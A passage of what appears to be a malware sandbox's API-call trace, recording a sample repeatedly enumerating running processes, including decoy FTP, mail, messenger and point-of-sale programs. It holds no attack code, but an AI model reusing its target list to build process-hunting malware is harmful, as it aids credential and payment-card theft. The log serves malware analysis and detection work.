hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0186.036] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0186.038] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0186.041] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0186.043] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0186.046] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0186.048] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0186.050] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0186.053] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0186.055] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0186.057] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0186.059] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0186.064] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0186.066] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0186.069] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0186.072] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0186.075] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0186.077] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0186.080] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0186.082] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0186.085] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0186.088] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0186.090] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0186.093] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0186.096] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0186.100] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0186.103] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0186.106] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0186.108] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0186.111] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0186.113] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0186.116] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0186.122] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0186.124] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0186.127] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0186.129] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0186.132] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0186.135] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0186.137] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0186.143] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0186.146] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0186.149] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0186.152] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0186.154] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0186.157] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0186.163] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0186.166] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0186.168] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0186.171] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0186.174] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0186.176] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0186.178] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0186.185] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0186.187] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0186.190] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0186.192] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0186.195] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0186.197] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0186.199] CloseHandle (hObject=0x14a0) returned 1 [0186.199] Sleep (dwMilliseconds=0x64) [0186.321] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1968 [0186.437] Process32First (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0186.439] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0186.441] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0186.443] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0186.445] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0186.447] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0186.450] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0186.451] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0186.453] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0186.455] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.504] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.508] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0186.510] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.512] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.515] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.517] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.520] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.522] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.525] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.527] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0186.532] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0186.535] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0186.537] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0186.540] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.606] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0186.609] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0186.611] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: 